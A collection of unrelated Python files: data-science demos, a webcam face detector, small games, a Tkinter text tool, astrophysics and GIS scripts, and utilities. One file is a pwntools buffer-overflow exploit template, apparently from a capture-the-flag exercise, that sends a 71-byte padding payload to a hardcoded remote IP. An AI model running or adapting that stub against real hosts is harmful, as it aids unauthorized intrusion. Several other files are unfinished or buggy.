y = df.loc[:,[target]].values
# Standardizing the features
x = MinMaxScaler().fit_transform(x)
normalizedDf = pd.DataFrame(data = x, columns = features)
normalizedDf = pd.concat([normalizedDf, df[[target]]], axis = 1)
# PCA projection
pca = PCA(2)
projected = pca.fit_transform(x)
print("Variância expleined por componente:")
print(pca.explained_variance_ratio_)
print(df.shape)
print(projected.shape)
print("")
# Applying our kmeans function from scratch
labels = KMeans_scratch(projected, k, 100)
# Visualize the results
plot_samples(projected, labels, 'Clusters Labels KMeans from scratch')
# Applying sklearn kemans function
kmeans = KMeans(n_clusters=k, random_state=0).fit(projected)
print("inertia_ = ", kmeans.inertia_)
silhouetteScore = silhouette_score(projected, kmeans.labels_)
print("Para n_clusters = {}, silhouette_score é {})".format(
k, silhouetteScore))
# Visualize the results sklearn
plot_samples(projected, kmeans.labels_,
'Clusters Labels KMeans from sklearn')
plt.show()
if __name__ == "__main__":
main() |
import cv2
import sys
import numpy
import time
num_frames = 120
face_cascade = cv2.CascadeClassifier('haarcascades/cascadG.xml')
# hand_cascade = cv2.CascadeClassifier('Hand.Cascade.1.xml')
cap = cv2.VideoCapture(0)
start = time.time()
count=0
num_frames =100
while(1):
ret, img = cap.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5,minSize=(30, 30),
flags=cv2.CASCADE_SCALE_IMAGE)
for (x,y,w,h) in faces:
cv2.rectangle(img,(x,y),(x+w,y+h),(255,255,0),2)
# hand = hand_cascade.detectMultiScale(gray,1.3, 5)
# for (ex,ey,ew,eh) in hand:
# cv2.rectangle(img,(ex,ey),(ex+ew,ey+eh),(0,127,255),2)
cv2.imshow('img',img)
# fps = 1 / (time.time() - start)
# print(fps)
k = cv2.waitKey(1) & 0xff
if k == 27:
break
count=count+1
end = time.time()
seconds = end - start
print("Time taken : {0} seconds".format(seconds))
fps =count / seconds
print ("Estimated frames per second : {0}".format(fps))
cap.release()
cv2.destroyAllWindows()
|
print("Pick a number")
print("Este programa genera un numero random y pregunta al usuario adivinarlo")
import random
rndm=random.randint(0,100)
print("El numero es: ",rndm)
tries=1
num=int(input("Escoje un numero del 1 al 100: "))
while(num!=rndm):
if(num>rndm):
print("Tu numero es muy grande")
elif(num<rndm):
print("tu numero es muy pequeño")
num=int(input("Escoje un numero del 1 al 100: "))
tries=tries+1
print("Felicidades tu adivinaste el numero {} , en {} oportunidades.".format(num,tries))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template
from pwn import *
# Set up pwntools for the correct architecture
context.update(arch='i386')
exe = './path/to/binary'
ip = "54.161.125.246"
port = 1000
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe] + argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
#io = start()
io = remote(ip, port)
payload_size=71
#payload = 'a'*payload_size + p64(0x400b4f)
payload = 'a'*payload_size
log.info('payload size: ' + str(payload_size))
log.info('payload: ' + payload)
io.sendline(payload)
io.interactive()
|
import random
import pymunk #1
#define the ball
def add_ball(space):
mass = 1
radius = 14
moment = pymunk.moment_for_circle(mass, 0, radius) # 1
body = pymunk.Body(mass, moment) # 2
x = random.randint(120, 380)
body.position = x, 550 # 3
shape = pymunk.Circle(body, radius) # 4
space.add(body, shape) # 5
return shape
#define the L
def add_L(space):
"""Add a inverted L shape with two joints"""
rotation_center_body = pymunk.Body(body_type = pymunk.Body.STATIC)
rotation_center_body.position = (300,300)
rotation_limit_body = pymunk.Body(body_type = pymunk.Body.STATIC)
rotation_limit_body.position = (200,300)
body = pymunk.Body(10, 10000)
body.position = (300,300)
l1 = pymunk.Segment(body, (-150, 0), (255.0, 0.0), 5.0)
l2 = pymunk.Segment(body, (-150.0, 0), (-150.0, 50.0), 5.0)
rotation_center_joint = pymunk.PinJoint(body, rotation_center_body, (0,0), (0,0))
joint_limit = 25
rotation_limit_joint = pymunk.SlideJoint(body, rotation_limit_body, (-100,0), (0,0), 0, joint_limit)
space.add(l1, l2, body, rotation_center_joint, rotation_limit_joint)
return l1,l2
|
from tkinter import *
from tkinter.scrolledtext import ScrolledText
from tkinter.messagebox import *
import re
import os
class StatusBar(Frame):
def __init__(self, parent):
Frame.__init__(self, parent)
self._lblState = Label(self, text='', bd=2, relief=SUNKEN, width=15, anchor = W)
self._lblState.pack(side=LEFT)
class SLETool(Frame):
def __init__(self, parent=None):
Frame.__init__(self, parent)
self.pack(side=TOP, fill=BOTH, expand=YES)
self.iniCtrls()
self.bind("<Destroy>", self.onDestroy)
def iniCtrls(self):
frmTop = Frame(self)
frmTop.pack(side=TOP, fill=X)
self.status_bar = StatusBar(self)
self.status_bar.pack(side=BOTTOM, fill=X)
self.status_bar.config(bd=2, relief=SUNKEN)
frmMiddle = Frame(self)
frmMiddle.pack(fill=BOTH, expand=YES)
self.btnCommaCount = Button(frmTop, text='Comma count', command=self.onCommaCount)
self.btnCommaCount.pack(side=LEFT, padx=5, pady=5)
self.btnMultiply48to4996 = Button(frmTop, text='Multiply from 48 to 49..96', command=self.onMultiply48to4996)
self.btnMultiply48to4996.pack(side=LEFT, padx=5, pady=5)
self.btnMultiply48to0196 = Button(frmTop, text='Multiply from 48 to 1..96', command=self.onMultiply48to0196)
self.btnMultiply48to0196.pack(side=LEFT, padx=5, pady=5)
self.btnBlock0148to4996 = Button(frmTop, text='Block from 1..48 to 49..96', command=self.onBlock0148to4996)
self.btnBlock0148to4996.pack(side=LEFT, padx=5, pady=5)
self.btnBlock3340to4148 = Button(frmTop, text='Block from 33..40 to 41..48', command=self.onBlock3340to4148)
self.btnBlock3340to4148.pack(side=LEFT, padx=5, pady=5)
self.btnSplit = Button(frmTop, text='Split', command=self.onSplit)
self.btnSplit.pack(side=LEFT, padx=5, pady=5)
self.btnSubst = Button(frmTop, text='Subst', command=self.onSubst)
self.btnSubst.pack(side=LEFT, padx=5, pady=5)
self.btnScript = Button(frmTop, text='Script', command=self.onScript)
self.btnScript.pack(side=LEFT, padx=5, pady=5)
Button(frmTop, text='Clear', command=self.onClear).pack(side=RIGHT, padx=5, pady=5)
self.st = ScrolledText(frmMiddle, font=('courier', 9, 'normal'))
self.st.pack(side=TOP, fill=BOTH, expand=YES)
def onCommaCount(self):
"""
Подсчёт количества запятых в тексте
"""
s = self.st.get('1.0', END)
cnt = 0
for c in s:
if c == ',':
cnt = cnt + 1
showinfo("Comma count", 'Comma count is ' + str(cnt))
def onMultiply48to4996(self):
"""
Умножение блока текста с номером 48 до текста с номерами от 49 до 96
"""
s = self.st.get('1.0', END+'-1c')
s1 = ""
for i in range(49,96+1):
sa = re.sub('48', str(i), s)
s1 = s1 + sa
self.st.insert(END, '===================================================\n')
self.st.insert(END, s1)
def onMultiply48to0196(self):
"""
Умножение блока текста с номером 48 до текста с номерами от 1 до 96
"""
s = self.st.get('1.0', END+'-1c')
s1 = ""
for i in range(1,96+1):
sa = re.sub('48', str(i), s)
s1 = s1 + sa
self.st.insert(END, '===================================================\n')
self.st.insert(END, s1)
def onBlock0148to4996(self):
"""
Замена в блоке текста номеров с 1 по 48 на номера с 49 до 96
"""
s1 = self.st.get('1.0', END+'-1c')
for i in range(1,48+1):
# "xx,", "xx ", "xx)", "xx-"
ma = re.compile(r'(.*)([^0-9])('+str(i)+')([^0-9])(.*)', re.DOTALL)
while True:
mo = ma.match(s1)
if mo is None: break
g = mo.groups()
#print('s1=%s groups 0=%s 1=%s 2=%s 3=%s' % (s1, g[0], g[1], g[2], g[3]))
s1 = g[0] + g[1] + str(i+48) + g[3] +g[4]
self.st.insert(END, '===================================================\n')
self.st.insert(END, s1)
def onBlock3340to4148(self):
"""
Замена в блоке текста номеров с 33 по 40 на номера с 41 до 48
"""
s1 = self.st.get('1.0', END+'-1c')
for i in range(33,40+1):
# "xx,", "xx ", "xx)", "xx-"
ma = re.compile(r'(.*)([^0-9])('+str(i)+')([^0-9])(.*)', re.DOTALL)
while True:
mo = ma.match(s1)
if mo is None: break
g = mo.groups()
#print('s1=%s groups 0=%s 1=%s 2=%s 3=%s' % (s1, g[0], g[1], g[2], g[3]))
s1 = g[0] + g[1] + str(i+8) + g[3] +g[4]
self.st.insert(END, '===================================================\n')
self.st.insert(END, s1)
def onSplit(self):
"""
Заготовка для разбиения длинной строки на строки по 5 позиций
"""
s = self.st.get('1.0', END+'-1c')
ma = re.compile(r'^( *)(.*)')
mo = ma.match(s)
s_ident = ''
s_text = s
if not mo is None:
g = mo.groups()
s_ident = g[0]
s_text = g[1]
s_res = ''
"""
while True:
for i in range(1, s_text.len()):
cnt = 0
if s_text[i] == '+':
cnt = cnt + 1
if cnt mod 5 == 0:
s_res = s_res + s_text[:i]
s_text = s_text[i:]
break
"""
self.st.insert(END, '===================================================\n')
self.st.insert(END, s_ident + s_res)
def onSubst(self):
"""
Разбиение строки с разделителем ";" на отдельные строки
"""
s = self.st.get('1.0', END+'-1c')
s2 = ''
for s1 in s.split(r';'):
s2 = s2 + '\n' + s1
self.st.insert(END, '===================================================\n')
self.st.insert(END, s2)
def onScript(self):
"""
Генерация SQLPLUS скрипта для наката на БД по каталогу с объектами (в рамках проекта по расширению услуг)
"""
def t_dir(dname, lname):
def t_file(name):
s = ''
s = s + 'prompt\n'
s = s + 'prompt Exec ' + name + '\n'
s = s + 'prompt ===========================\n'
s = s + '@@' + server_name + '\\' + schema_name + '\\' + name + '\n'
return s
def t_ext(ext):
names = [fname for fname in os.listdir(dname) if (os.path.isfile(os.path.join(dname, fname)) and fname.endswith('.' + ext))]
s = ''
for x in names:
s = s + t_file(x) + '\n'
return s
s = ''
s = s + 'set define off\n'
s = s + 'spool ' + lname + '\n'
s = s + '\n'
s = s + t_ext('tab')
s = s + t_ext('vw')
s = s + t_ext('mv')
s = s + t_ext('sql') # Тоже с view
s = s + t_ext('tps')
s = s + t_ext('trg')
s = s + t_ext('fnc')
s = s + t_ext('prc')
s = s + t_ext('pck')
s = s + 'prompt All done.\n'
s = s + '\n'
s = s + 'spool off\n'
s = s + '\n'
return s
root_name = r'C:\Users\KSHIPKOV\Documents\SVN\HS\Materials\Source code\Oracle\48to96\Output'
s = ''
server_names = [sname for sname in os.listdir(root_name) if os.path.isdir(os.path.join(root_name, sname))]
for server_name in server_names:
schema_names = [sname for sname in os.listdir(os.path.join(root_name, server_name)) if os.path.isdir(os.path.join(root_name, server_name, sname))]
for schema_name in schema_names:
s = s + 'file: ' + server_name + '_' + schema_name + '.sql\n'
lname = server_name + '_' + schema_name + '.log'
dname = os.path.join(root_name, server_name, schema_name)
s = s + t_dir(dname, lname)
self.st.insert(END, s)
def onSubst1(self):
s = self.st.get('1.0', END+'-1c')
sr = ''
ma = re.compile(r'(.*), nach([0-9]*),(.*)')
for s1 in s.split('\n'):
mo = ma.match(s1)
if not mo is None:
g = mo.groups()
s2 = g[0] + ', nullif(nach' + g[1] + ',0) nach' + g[1] + ','+ g[2]
else:
s2 = s1
sr = sr + s2 + '\n'
self.st.insert(END, '===================================================\n')
self.st.insert(END, sr)
def onClear(self):
self.st.delete('1.0', END)
def onDestroy(self, event):
pass
if __name__ == '__main__':
root = Tk()
root.title("SLETool1")
SLETool(root).mainloop()
|
"""
write a function, calculate the number of a e i o u in the letter
"""
def count_vowel(s):
if not isinstance(s, str):
raise ValueError("ValueError: input must be a string")
if len(s) == 0:
return 0
counter = 0
vowel_list = ['a', 'e', 'i', 'o', 'u']
for letter in s:
if letter.lower() in vowel_list: counter += 1
return counter
if __name__ == '__main__':
print("{}: {}".format("aeiouAEIOU", count_vowel("aeiouAEIOU")))
# print("{}: {}".format(5, count_vowel(5)))
print("{}: {}".format("", count_vowel("")))
print("{}: {}".format("batch", count_vowel("batch")))
|
##############Creates se files:
##This script writes the data of cycle cycle_all from file run_H5 into
##the sefile outputfile for a number of cycles given by cycles variable
import nugridse as mp
import sewrite as sw
import numpy as np
###############Read se file to get header information
run_H5='e2D14.0077501.se.h5'
cycle_all=77991
sefiles=mp.se('.',run_H5,rewrite=True)
hattrs=sefiles.se.hattrs
hattrs_data=[]
for k in range(len(hattrs)):
if hattrs[k]=='age_unit':
hattrs_data.append(1.)
continue
hattrs_data.append(sefiles.get(hattrs[k]))
cattrs=[]
for k in range(len(sefiles.se.cattrs)):
if ((sefiles.se.cattrs[k] == 'age') or (sefiles.se.cattrs[k] == 'deltat')) or (sefiles.se.cattrs[k]=='shellnb'):
continue
cattrs.append(str(sefiles.se.cattrs[k]))
cattrs_data=[]
for k in range(len(cattrs)):
cattrs_data.append(sefiles.get(cycle_all,str(cattrs[k])))
dcols=["dcoeff","radius","rho","temperature"]
dcols_data=[]
for k in range(len(dcols)):
#print dcols[k]
dcols_data.append(sefiles.get(cycle_all,dcols[k]))
mass2=sefiles.get(cycle_all,'mass')
age=sefiles.get(cycle_all,'age') # unit in years
deltat=sefiles.get(cycle_all,'deltat') #unit in s
#use the radius below
#plt.figure()
#plt.plot(mass,radius,label='radius special')
#plt.legend()
#plt.figure()
########Grid changes/mesh refinement:
#mass2 represents the se restart grid, see first section in file
#xm in fortran with maximum poosibble grid size entries/empty
#dxm from ppn_frame.input
dxm=1e-4
xmrmaxi=0.5987
xmrmin=0.57556
xmsg=[0.5880, 0.5890 ,0.5979]
dxmsg=[4.e-4,6.e-5,4.e-4]
xm = [xmrmin]
dq=[7.e-4] #mass grid se, set first cell size to this value
dq=[6.e-4]
dq=[7.5e-4]
#dq between 0 and 2*4e-4, for dq=7e-4 shows no negative dq anymore
#dq between 0 and 2*4e-4
xmrmax=max(mass2)
xmrmax = min(xmrmaxi,xmrmax)
ddxm=dxm
ddxm1=dxm
i=0
while(True):
ddxm=dxm
for j in range(len(xmsg))[::-1]:
if xm[i]+dxmsg[j] < xmsg[j]:
ddxm=dxmsg[j]
#print 'change xm at mass',xm[i],ddxm,i
i+=1
xm.append(round(xm[i-1] + ddxm,10))
dq.append(round(2* (ddxm - dq[-1]/2.),10 ))
if xm[i] >=xmrmax:
xm[i] = xmrmax
break
#result: xm,xmm, xm center, xmm, outer boundary
xm1=xm
shellnb=len(xm)
#Checck ingestion arad: how many cells?
#if(xm(j).ge.xmrmax-4.d-4)then
counter=0
for k in range(len(xm)):
if xm[k]>=(xm[-1]-4e-4 ):
counter+=1
print 'Number of cells in which H will be ingested:'
print counter
##below for findig the right start dq which gives the for all other dq>0
#plt.figure()
#plt.plot(xm1,dq,label='dq/delta mass')
#diff=(np.array(xm[1:])-np.array(xm[:-1]))
#plt.plot(xm[1:],diff,label='xm diff',marker='o',markevery=1)
############ Interpolate other parameter (rho,T) on new grid
#adapt those parameter below on new grid/except mass,
#mass2: outer boundary of cell, from e2D14.0077501.se.h5
#the original routine l. 1862 needs the grid of the se input file xmm
#+ the new mppnp grid xm (with center mass coord)
# therefore take mass2 as xmm, and xm from above
dcols_name=["dcoeff","radius","rho","temperature"]
#data in dcols_data
#number of shells mi,
#mi=len(mass2)
xmm=mass2 #from se file
from operator import itemgetter
xfind = 0.
ifindpos = 0
rhoppg=[]
t9ppg=[]
dppg = []
rppg = []
#carries the modified diffusion coeff
dppgLagr=[]
dppgLagr_split=[]
dppg_split=[]
#print hattrs
dcoeff_unit=hattrs_data[hattrs.index('dcoeff_unit')][0]
rho_unit=hattrs_data[hattrs.index('rho_unit')][0]
temperature_unit=hattrs_data[hattrs.index('temperature_unit')][0]
radius_unit=hattrs_data[hattrs.index('radius_unit')][0]
#print test
#print 'age unit',hattrs_data[hattrs.index('age_unit')][0] #in years
#print dcoeff_unit,rho_unit,temperature_unit,radius_unit
for j in range(len(xm)):
xfind = xm[j]
#ifindpos = MINLOC (xmm(1:mi), MASK = xmm(1:mi) .GT. xfind)
ifindpos=list(xmm).index(min(x for x in xmm if x > xfind))
x=xfind
x1=xmm[ifindpos]
x2=xmm[ifindpos+1]
y1=dcols_data[2][ifindpos] *rho_unit #dcol_data[2] is rho
y2=dcols_data[2][ifindpos+1] *rho_unit
rhoppg.append(y1+((y2-y1)/(x2-x1))*(x-x1) )
# if (ifindpos(1).eq.0) print *,"j, xfind, ifindpos: ",j, xfind,
#$ ifindpos,(xmm(i),i=1,2)
#rhoppg(j)= ylin(xfind, xmm(ifindpos(1)) ,xmm(ifindpos(1)+1)
#$ ,rhose(ifindpos(1)),rhose(ifindpos(1)+1))
y1=dcols_data[3][ifindpos] *temperature_unit #dcol_data[3] temperature
y2=dcols_data[3][ifindpos+1] *temperature_unit
t9ppg.append( ( y1+((y2-y1)/(x2-x1))*(x-x1)))
#print 't9ppg'
#print ( y1+((y2-y1)/(x2-x1))*(x-x1))
# t9ppg(j)= ylin(xfind, xmm(ifindpos(1)) ,xmm(ifindpos(1)+1)
#$ ,t8se(ifindpos(1)),t8se(ifindpos(1)+1))
#
y1=dcols_data[0][ifindpos]*dcoeff_unit # [d] = cm^2/s
y2=dcols_data[0][ifindpos+1]*dcoeff_unit
dppg.append( ( y1+((y2-y1)/(x2-x1))*(x-x1)) )
# dppg(j)= ylin(xfind, xmm(ifindpos(1)) ,xmm(ifindpos(1)+1)
#$ ,dse(ifindpos(1)),dse(ifindpos(1)+1))
y1=dcols_data[1][ifindpos] *radius_unit#radius
y2=dcols_data[1][ifindpos+1] *radius_unit
rppg.append( ( y1+((y2-y1)/(x2-x1))*(x-x1)))
# rppg(j)= ylin(xfind, xmm(ifindpos(1)) ,xmm(ifindpos(1)+1)
#$ ,rse(ifindpos(1)),rse(ifindpos(1)+1))
###here in loop adapt diffusion coefficient
dconst = 3.0589703419947736e-11
dconst=6.314572864321608e-33
#C *** transform to Lagrangian coordinate: D_Lagr = (4*PI*R**2*RHO)**2*D_Eularian
#C *** and also delta_xm in mixdiffnet is in solar mass units, and since there is
#C *** a second order spatial derivative:
#C D_Lagr,mppn = (4*PI*R^2*RHO/Msun)**2*D_Eularian
#C solar constants: radius 6.96E10cm, mass 1.99E33 g
#C units from reading HPF files: [R]=Rsun, [rho]=cgs
#C 4*Pi*Rsun^2/Msun = 3.0589703419947736e-11
dppgLagr.append(0)
dppgLagr_split.append(0)
if (dppg[j]>0):
if (j==1):
RH = np.log(rhoppg[j]) #rhoppg
HLOG = np.log(rppg[j]) #rppg in cm
else:
RH = (np.log(rhoppg[j]) + np.log(rhoppg[j-1]))/2.
HLOG = (np.log(rppg[j]) + np.log(rppg[j-1]))/2.
#endif ! dppgLagr: Lagrangian coordinates assuming solar mass units
#if (ksubc.ge.isplitstart .and. isplit.eq.1) then
a1=1.e4
a2=1.e7
xmsplit=0.5885
#print xm, xmsplit
dsplit = dppg[j] / (1. + a2*np.exp(-(a1*(xm[j]-xmsplit))**2))
#else
# dsplit = dppg(J)
#end if
dppg_split.append(dppg[j] / (1. + a2*np.exp(-(a1*(xm[j]-xmsplit))**2)))
dppgLagr_split[j] = dsplit * (dconst**2)*np.exp(2*(2*HLOG+RH))
dsplit = dppg[j]
dppgLagr[j] = dsplit * (dconst**2)*np.exp(2*(2*HLOG+RH))
#ppgLagr(j) = dsplit * dconst**2*exp(2*(2*HLOG+RH))
#dppgLagr(j) = dppg(J) * dconst**2.*exp(2.d0*(2.d0*HLOG+RH))
##########Do some test polotting
if (False):
'''
plt.plot(xm1,t9ppg,label='T9',marker='o',markevery=1)
plt.xlabel('mass coordinate')
plt.ylabel('temperature')
plt.figure()
plt.legend()
plt.plot(xm1,rhoppg,label='Rho',marker='o',markevery=1)
plt.legend()
plt.xlabel('mass coordinate')
plt.ylabel('Rho')
plt.figure()
plt.plot(xm1,np.log10(dppgLagr),label='se diffusion')
plt.plot(xm1,np.log10(dppgLagr_split),label='Modification of se diffusion')
#plt.yscale('log')
plt.xlabel('mass coordinate')
plt.ylabel('Log Diffusion coefficient')
plt.legend()
plt.figure()
plt.plot(xm1,dppg,label='dppg')
plt.plot(xm1,dppg_split,label='dppg split')
plt.legend()
plt.figure()
plt.plot(xm1,dppg,label='dppg')
plt.plot(xm1,dppg_split,label='dppg split')
plt.legend()
plt.xlabel('mass coordinate')
plt.ylabel('D [cm^2/s]')
'''
plt.figure('test')
plt.plot(xm1,dq,label='dq '+str(dq[0]),marker='o',markevery=1)
#diff=(np.array(xm1[1:])-np.array(xm1[:-1]))
#plt.plot(xm1[1:],diff,label='xm1 diff',marker='o',markevery=1)
#plt.legend()
#plt.ylim(-1e-5,1e-3)
#print 'XM ...'
#print xm1[:5]
###############Write out cycle_all for each cycle of cycles
##Important: change 'age','deltat' so that timesteps of 63s
deltat=63. #s
cycles=range(77991,(77991+3002))
cycle_bndy=[77991,78001,78501,79001,79501,80001,80501,81001]
outputfiles=['e2D14_hif.0077501.se.h5','e2D14_hif.0078001.se.h5','e2D14_hif.0078501.se.h5','e2D14_hif.0079001.se.h5','e2D14_hif.0079501.se.h5','e2D14_hif.0080001.se.h5','e2D14_hif.0080501.se.h5']
i=0
#for se files inverted mass, surface is first element
dppg=dppg[::-1]
dppgsplit=dppg_split[::-1]
dppgLagr=dppgLagr[::-1]
rppg=rppg[::-1]
xm1=xm1[::-1]
dq=dq[::-1]
rhoppg=rhoppg[::-1]
t9ppg=t9ppg[::-1]
print 'compare types'
print type(dppgLagr),type(dppg),type(dppg_split)
for cyc in cycles:
cyc = int(cyc)
if cyc==cycle_bndy[i]:
print 'start writing in file ',outputfiles[i]
f=sw.startfile(outputfiles[i])
f.write_hattr(hattr_name=hattrs,hattr_val=hattrs_data)
#Add specific header info about first cycle
f.write_hattr(hattr_name=['firstcycle'],hattr_val=[np.array([cyc], dtype=np.int32)])
i+=1
#f.write_dcol(cyc,dcol_name=dcols,dcol_val=dcols_data)
#start with split
#here the Mesa se mass coord for 'mass' and delta mass were chosen
if cyc>=(951+77991):
f.write_dcol(cyc,dcol_name=["dcoeff","radius","mass","delta_mass","rho","temperature"],dcol_val=[dppgsplit,rppg,xm1,dq,rhoppg,t9ppg])
else:
f.write_dcol(cyc,dcol_name=["dcoeff","radius","mass","delta_mass","rho","temperature"],dcol_val=[dppg,rppg,xm1,dq,rhoppg,t9ppg])
f.write_cattr(cyc,cattr_name=cattrs,cattr_val=cattrs_data)
#due to timesteps of 63s
f.write_cattr(cyc,cattr_name=['deltat','age','shellnb'],cattr_val=[deltat,age,shellnb])
age+=(deltat) #age als oin years #*3.1689e-8)
|
# ------------------------------------------------------------------------------
# Metropolitan Form Analysis Toolbox-Coverage
# Credit: Reza Amindarbari, Andres Sevtsuk
# City Form Lab
# for more infomation see:
# Amindarbari, R., Sevtsuk, A., 2013, "Measuring Growth and Change in Metropolitan Form"
# presented at the Urban Affairs Association annual conference in San Francisco
# ------------------------------------------------------------------------------
import sys, arcpy
arcpy.env.overwriteOutput=1
def getarea(fc):
fields=arcpy.ListFields(fc)
if "AREA" not in fields:
arcpy.AddField_management (fc, "AREA","DOUBLE")
arcpy.CalculateField_management (fc, "AREA", '!shape.area@squarekilometers!','PYTHON')
fc_area=0
cursor = arcpy.SearchCursor(fc)
for row in cursor:
fc_area=fc_area+row.getValue('AREA')
del cursor
return fc_area
blt=sys.argv[1]
unb=sys.argv[2]
out_dir=sys.argv[3]
dsc=arcpy.Describe(out_dir)
if dsc.dataType=="Workspace":
convex=out_dir+"/"+"convex"
unb_merged=out_dir+"/"+"unb_merge"
unb_clip=out_dir+"/"+"unb_clip"
elif dsc.dataType=="Folder":
convex=out_dir+"/"+"convex.shp"
unb_merged=out_dir+"/"+"unb_merge.shp"
unb_clip=out_dir+"/"+"unb_clip.shp"
arcpy.MinimumBoundingGeometry_management (blt, convex, 'CONVEX_HULL', 'ALL')
convex_area=getarea(convex)
blt_area=getarea(blt)
if unb!='false' and unb!='#':
arcpy.AddMessage(str(unb))
arcpy.Merge_management(unb, unb_merged)
arcpy.Clip_analysis (unb_merged, convex,unb_clip)
unb_area=getarea(unb_clip)
msg=str(blt_area/(convex_area-unb_area))
arcpy.AddMessage('Coverage: '+msg)
arcpy.Delete_management(unb_merged)
arcpy.SetParameterAsText(3,convex)
arcpy.SetParameterAsText(4,unb_clip)
else:
msg=str(blt_area/convex_area)
arcpy.AddMessage('Coverage: '+msg)
arcpy.SetParameterAsText(3,convex)
print msg |
from flask import Flask, Blueprint
def create_app():
app = Flask(__name__)
# Register your Blueprints
from app.echo import echo
from app.root import root
app.register_blueprint(echo)
app.register_blueprint(root)
return app
|
class Carro:
quantidadeRodas = 4
cor = "azul"
def __init__(self, quantidadeRodas, cor):
self.quantidadeRodas = quantidadeRodas
self.cor = cor
def setQuantidadeRodas(self, quantidadeRodas):
self.quantidadeRodas = quantidadeRodas
meuCarro1 = Carro(10, "azul")
meuCarro1.quantidadeRodas
|
#!/usr/bin/python3
from panflute import *
def demote_header(elem, doc):
"""Demotes headers to prevent first-level headers.
First-level headers are reserved for daily headers"""
if isinstance(elem, Header):
elem.level += 1
def simple_id(filename):
return ''.join((c for c in filename if c.isdigit()))
def fix_header_id(elem, doc):
"""Prefixes header labels with date to prevent conflicts"""
if isinstance(elem, Header):
prefix = simple_id(str(doc.metadata['title']))
elem.identifier = prefix + ':' + elem.identifier
def combine_filters(*filters):
"""Combines all the filters passed in."""
def combined(elem, doc):
for f in filters:
f(elem, doc)
return combined
def main(doc=None):
f = combine_filters(demote_header, fix_header_id)
return run_filter(f, doc=doc)
if __name__ == '__main__':
main()
|
import numpy as np
# LOAD TXT AND SAVE AS NPY
data = np.loadtxt("labels.txt", delimiter=",")
bigNpy = []
for i in range(0, 1200):
thisLabel1 = str(data[i][0])
thisLabel2 = str(data[i][1])
thisLabel3 = str(data[i][2])
bigNpy.append(thisLabel)
a =4
np.save("labelsNpy.npy", bigNpy)
# # LOAD NPY FIRST
# aa = np.load("labelsNpy.npy")
# ab = aa[0]
#
#
# a = 4 |
import tensorflow as tf
import commons.mnist.inf.model_def as model_def
class InferenceNetwork(object):
def __init__(self):
self.sess = tf.Session()
self.x_ph = tf.placeholder(tf.float32, shape=[None, 28, 28, 1], name='x_ph')
self.logits, self.y_hat, self.keep_prob = model_def.infer(self.x_ph, 'inf')
restore_vars = model_def.inf_restore_vars()
restore_dict = {var.op.name: var for var in tf.global_variables() if var.op.name in restore_vars}
self.default_feed_dict = {self.keep_prob : 1.0}
inf_restorer = tf.train.Saver(var_list=restore_dict)
inf_restore_path = tf.train.latest_checkpoint('./commons/mnist/inf/ckpt/bs64_lr0.0001/')
inf_restorer.restore(self.sess, inf_restore_path)
def get_y_hat_val(self, x_sample_val):
self.default_feed_dict[self.x_ph] = x_sample_val
y_hat_val = self.sess.run(self.y_hat, feed_dict=self.default_feed_dict)
return y_hat_val
|
#!/usr/bin/python
#Print a dictionary with a nice format
def PrintDict(d,indent=0):
for k,v in d.items():
if type(v)==dict:
print ' '*indent,'[',k,']=...'
PrintDict(v,indent+1)
else:
print ' '*indent,'[',k,']=',v
#Container class that can hold any variables
#ref. http://blog.beanz-net.jp/happy_programming/2008/11/python-5.html
class TContainer:
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return str(self.__dict__)
def __iter__(self):
return self.__dict__.itervalues()
#return self.__dict__.iteritems()
def items(self):
return self.__dict__.items()
def iteritems(self):
return self.__dict__.iteritems()
def keys(self):
return self.__dict__.keys()
def values(self):
return self.__dict__.values()
def __getitem__(self,key):
return self.__dict__[key]
def __setitem__(self,key,value):
self.__dict__[key]= value
def __delitem__(self,key):
del self.__dict__[key]
def __contains__(self,key):
return key in self.__dict__
class TTest:
def __init__(self,x):
self.x= x
print 'Test class',self.x
def __del__(self):
print 'Deleted',self.x
def Print(self):
print 'This is',self.x
def main():
cont= TContainer()
cont.var_1= TTest(1.23)
cont.var_2= TTest('hoge')
cont.var_3= TTest('aa aa')
#print cont
if 'var_2' in cont: print 'var_2 is contained'
PrintDict(cont)
for i in cont:
i.Print()
del i
#for v in cont:
#del v
#for k,v in cont.items():
#v.Print()
#del cont[k]
#del k,v
for k in cont.keys():
print 'del',k,cont[k].x
del cont[k]
#del cont.var_1
#del cont.var_2
#del cont.var_3
PrintDict(cont)
print '----'
if __name__=='__main__':
main()
print '===='
|
#modules (libraries)
import os
import csv
# Set the path to access the file
csvpath = os.path.join("Resources", "budget_data.csv")
# Define total months
total_months = 0
# Defint net total
net_total = 0
# Define list of change values
empty_list = []
month_list = []
profit_list = []
monthly_profit_change = []
net_change=0
greatest_increase = ["",0]
greatest_decrease = ["",0]
# Open the CSV
with open(csvpath) as csvfile:
csvreader = csv.reader(csvfile)
# Acknowledge the header and read
csv_header = next(csvreader)
first_row = next(csvreader)
month_list.append(first_row[0])
# append the profit list
profit_list.append(int(first_row[1]))
#
total_months = total_months + 1
#
net_total = net_total + int(first_row[1])
#
#changes = int(first_row[1])
prev_net = int(first_row[1])
# Create a for loop to read through data after the header
for row in csvreader:
print(row)
# Calculate the total months in the dataset
total_months = total_months + 1
print(total_months)
month_list.append(row[0])
# append the profit list
profit_list.append(int(row[1]))
# Net changes
net_total = net_total + int(row[1])
print(net_total)
# Find the changes
changes = int(row[1]) - prev_net
empty_list.append(changes)
prev_net = int(row[1])
#need to do greatest increast/ decrease in here
if changes > greatest_increase[1]:
greatest_increase[0]=row[0]
greatest_increase[1] = changes
if changes < greatest_decrease[1]:
greatest_decrease[0]=row[0]
greatest_decrease[1] = changes
# create a loop to get the monthly change in profits
for i in range(len(profit_list)-1):
# Find the difference between any two months, and append to the monthly change in profits
monthly_profit_change.append(profit_list[i+1]-profit_list[i])
#Calculating average monthly change
